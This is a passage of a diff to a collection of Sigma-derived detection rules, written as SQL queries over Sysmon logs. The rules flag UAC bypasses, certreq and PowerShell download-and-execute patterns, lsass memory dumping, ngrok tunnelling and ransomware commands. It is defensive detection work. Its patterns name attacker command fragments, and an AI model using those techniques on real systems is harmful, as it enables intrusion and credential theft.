"Unknown" + "Possible depending on environment. Pair with other factors such as net connections, command-line args, etc." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%(WCHAR)0x%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\csi.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND OriginalFileName = 'csi.exe')" ], - "filename": "proc_creation_win_powershell_obfuscation_via_utf8.yml" + "filename": "proc_creation_win_csi_use_of_csharp_console.yml" }, { - "title": "UAC Bypass Using Windows Media Player - Process", - "id": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", - "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "title": "Suspicious Certreq Command to Download", + "id": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", + "status": "experimental", + "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\mmc.exe\" \"C:\\\\Windows\\\\system32\\\\eventvwr.msc\" /s' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certreq.exe' ESCAPE '\\' OR OriginalFileName = 'CertReq.exe') AND (CommandLine LIKE '% -Post %' ESCAPE '\\' AND CommandLine LIKE '% -config %' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\windows\\\\win.ini %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_wmp.yml" + "filename": "proc_creation_win_lolbin_susp_certreq_download.yml" }, { - "title": "Suspicious Download From Direct IP Via Bitsadmin", - "id": "99c840f2-2012-46fd-9141-c761987550ef", + "title": "PUA - DefenderCheck Execution", + "id": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", + "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.t1027.005" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DefenderCheck.exe' ESCAPE '\\' OR Description = 'DefenderCheck'))" ], - "filename": "proc_creation_win_bitsadmin_download_direct_ip.yml" + "filename": "proc_creation_win_pua_defendercheck.yml" }, { - "title": "Suspicious Parent Double Extension File Execution", - "id": "5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", - "status": "experimental", - "description": "Detect execution of suspicious double extension files in ParentCommandLine", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - SILENTTRINITY Stager Execution", + "id": "03552375-cc2c-4883-bbe4-7958d5a980be", + "status": "test", + "description": "Detects SILENTTRINITY stager use via PE metadata", + "author": "Aleksey Potapov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1036.007" + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%.doc.lnk' ESCAPE '\\' OR ParentImage LIKE '%.docx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.xls.lnk' ESCAPE '\\' OR ParentImage LIKE '%.xlsx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.ppt.lnk' ESCAPE '\\' OR ParentImage LIKE '%.pptx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.rtf.lnk' ESCAPE '\\' OR ParentImage LIKE '%.pdf.lnk' ESCAPE '\\' OR ParentImage LIKE '%.txt.lnk' ESCAPE '\\' OR ParentImage LIKE '%.doc.js' ESCAPE '\\' OR ParentImage LIKE '%.docx.js' ESCAPE '\\' OR ParentImage LIKE '%.xls.js' ESCAPE '\\' OR ParentImage LIKE '%.xlsx.js' ESCAPE '\\' OR ParentImage LIKE '%.ppt.js' ESCAPE '\\' OR ParentImage LIKE '%.pptx.js' ESCAPE '\\' OR ParentImage LIKE '%.rtf.js' ESCAPE '\\' OR ParentImage LIKE '%.pdf.js' ESCAPE '\\' OR ParentImage LIKE '%.txt.js' ESCAPE '\\') OR (ParentCommandLine LIKE '%.doc.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.doc.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.js%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description LIKE '%st2stager%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_double_extension_parent.yml" + "filename": "proc_creation_win_hktl_silenttrinity_stager.yml" }, { - "title": "Suspicious New Service Creation", - "id": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", + "title": "VMToolsd Suspicious Child Process", + "id": "5687f942-867b-4578-ade7-1e341c46e99a", "status": "experimental", - "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ + "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", + "author": "behops, Bhabesh Raj", + "tags": [ + "attack.execution", "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.t1059" ], "falsepositives": [ - "Unlikely" + "Legitimate use by administrator" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath=%' ESCAPE '\\') OR (CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')) AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'RUNDLL32.EXE', 'REGSVR32.EXE', 'wscript.exe', 'cscript.exe'))) AND NOT ((CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweron-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweroff-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\resume-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\suspend-vm-default.bat%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_service_creation.yml" + "filename": "proc_creation_win_vmware_vmtoolsd_susp_child_process.yml" }, { - "title": "HackTool - ADCSPwn Execution", - "id": "cd8c163e-a19b-402e-bdd5-419ff5859f12", - "status": "test", - "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", + "title": "UAC Bypass via ICMLuaUtil", + "id": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", + "status": "experimental", + "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1557.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% --adcs %' ESCAPE '\\' AND CommandLine LIKE '% --port %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '%/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '%/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe'))" ], - "filename": "proc_creation_win_hktl_adcspwn.yml" + "filename": "proc_creation_win_uac_bypass_icmluautil.yml" }, { - "title": "Rar Usage with Password and Compression Level", - "id": "faa48cae-6b25-4f00-a094-08947fef582f", - "status": "test", - "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.", - "author": "@ROxPinTeddy", + "title": "Suspicious PowerShell Download and Execute Pattern", + "id": "e6c54d94-498c-4562-a37c-b469d8e9a275", + "status": "experimental", + "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of Winrar command line version", - "Other command line tools, that use these flags" + "Software installers that pull packages from remote systems and execute them" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% -hp%' ESCAPE '\\' AND (CommandLine LIKE '% -m%' ESCAPE '\\' OR CommandLine LIKE '% a %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%IEX ((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX (New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX(New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '% -command (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '% -c (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rar_compression_with_password.yml" + "filename": "proc_creation_win_powershell_susp_download_patterns.yml" }, { - "title": "HackTool - CrackMapExec PowerShell Obfuscation", - "id": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", + "title": "ZxShell Malware", + "id": "f0b70adb-0075-43b0-9745-e82a1c608fcc", "status": "test", - "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", - "author": "Thomas Patzke", + "description": "Detects a ZxShell start by the called and well-known function name", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ "attack.execution", - "attack.t1059.001", + "attack.t1059.003", "attack.defense_evasion", - "attack.t1027.005" + "attack.t1218.011", + "attack.s0412", + "attack.g0001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%join%split%' ESCAPE '\\' OR CommandLine LIKE '%( $ShellId[1]+$ShellId[13]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $PSHome[%]+$PSHOME[%]+%' ESCAPE '\\' OR CommandLine LIKE '%( $env:Public[13]+$env:Public[5]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $env:ComSpec[4,%,25]-Join'''')%' ESCAPE '\\' OR CommandLine LIKE '%[1,3]+''x''-Join'''')%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (CommandLine LIKE '%zxFunction%' ESCAPE '\\' OR CommandLine LIKE '%RemoteDiskXXXXX%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml" + "filename": "proc_creation_win_apt_zxshell.yml" }, { - "title": "PUA - Ngrok Execution", - "id": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", - "status": "test", - "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", + "title": "Process Access via TrolleyExpress Exclusion", + "id": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", + "status": "experimental", + "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.defense_evasion", + "attack.t1218.011", + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Another tool that uses the command line switches of Ngrok", - "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% tcp 139%' ESCAPE '\\' OR CommandLine LIKE '% tcp 445%' ESCAPE '\\' OR CommandLine LIKE '% tcp 3389%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5985%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5986%' ESCAPE '\\') OR (CommandLine LIKE '% start %' ESCAPE '\\' AND CommandLine LIKE '%--all%' ESCAPE '\\' AND CommandLine LIKE '%--config%' ESCAPE '\\' AND CommandLine LIKE '%.yml%' ESCAPE '\\') OR (Image LIKE '%ngrok.exe' ESCAPE '\\' AND (CommandLine LIKE '% tcp %' ESCAPE '\\' OR CommandLine LIKE '% http %' ESCAPE '\\' OR CommandLine LIKE '% authtoken %' ESCAPE '\\')) OR (CommandLine LIKE '%.exe authtoken %' ESCAPE '\\' OR CommandLine LIKE '%.exe start --all%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\TrolleyExpress 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe -ma %' ESCAPE '\\') OR (Image LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' AND NOT ((OriginalFileName LIKE '%CtxInstall%' ESCAPE '\\') OR (OriginalFileName = '')))))" ], - "filename": "proc_creation_win_pua_ngrok.yml" + "filename": "proc_creation_win_citrix_trolleyexpress_procdump.yml" }, { - "title": "Execution from Suspicious Folder", - "id": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", + "title": "Suspicious Renamed Comsvcs DLL Loaded By Rundll32", + "id": "8cde342c-ba48-4b74-b615-172c330f2e93", "status": "experimental", - "description": "Detects a suspicious execution from an uncommon folder", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.credential_access", "attack.defense_evasion", - "attack.t1036" + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Intel\\\\Logs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\RSA\\\\MachineKeys\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\NetworkService\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Help\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Media\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\repair\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\security\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\') OR Image LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (Hashes LIKE '%IMPHASH=eed93054cb555f3de70eaa9787f32ebb%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5e0dbdec1fce52daae251a110b4f309d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=eadbccbb324829acb5f2bbe87e5549a8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=407ca0f7b523319d758a40d7c0193699%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=281d618f4e6271e527e6386ea6f748de%' ESCAPE '\\')) AND NOT (ImageLoaded LIKE '%\\\\comsvcs.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_execution_path.yml" + "filename": "image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml" }, { - "title": "Process Access via TrolleyExpress Exclusion", - "id": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", + "title": "Pingback Backdoor DLL Loading Activity", + "id": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", "status": "experimental", - "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1218.011", - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\TrolleyExpress 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe -ma %' ESCAPE '\\') OR (Image LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' AND NOT ((OriginalFileName LIKE '%CtxInstall%' ESCAPE '\\') OR (OriginalFileName = '')))))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdtc.exe' ESCAPE '\\' AND ImageLoaded LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_citrix_trolleyexpress_procdump.yml" + "filename": "image_load_malware_pingback_backdoor.yml" }, { - "title": "Potential Conti Ransomware Activity", - "id": "689308fc-cfba-4f72-9897-796c1dc61487", + "title": "Possible Process Hollowing Image Loading", + "id": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", "status": "test", - "description": "Detects a specific command used by the Conti ransomware group", - "author": "frack113", + "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz", + "author": "Markus Neis", "tags": [ - "attack.impact", - "attack.s0575", - "attack.t1486" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Very likely, needs more tuning" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-net %' ESCAPE '\\' AND CommandLine LIKE '%-size %' ESCAPE '\\' AND CommandLine LIKE '%-nomutex %' ESCAPE '\\' AND CommandLine LIKE '%-p \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\notepad.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinSCard.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_conti_ransomware_commands.yml" + "filename": "image_load_susp_uncommon_image_load.yml" }, { - "title": "Proxy Execution via Wuauclt", - "id": "af77cf95-c469-471c-b6a0-946c685c4798", + "title": "DotNet CLR DLL Loaded By Scripting Applications", + "id": "4508a70e-97ef-4300-b62b-ff27992990ea", "status": "test", - "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team", + "description": "Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.", + "author": "omkar72, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.execution", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%RunHandlerComServer%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /UpdateDeploymentProvider UpdateDeploymentProvider.dll %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\clr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscorlib.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_wuauclt.yml" + "filename": "image_load_susp_script_dotnet_clr_dll_load.yml" }, { - "title": "PUA - RunXCmd Execution", - "id": "93199800-b52a-4dec-b762-75212c196542", + "title": "PCRE.NET Package Image Load", + "id": "84b0a8f3-680b-4096-a45b-e9a89221727c", "status": "test", - "description": "Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects processes loading modules related to PCRE.NET 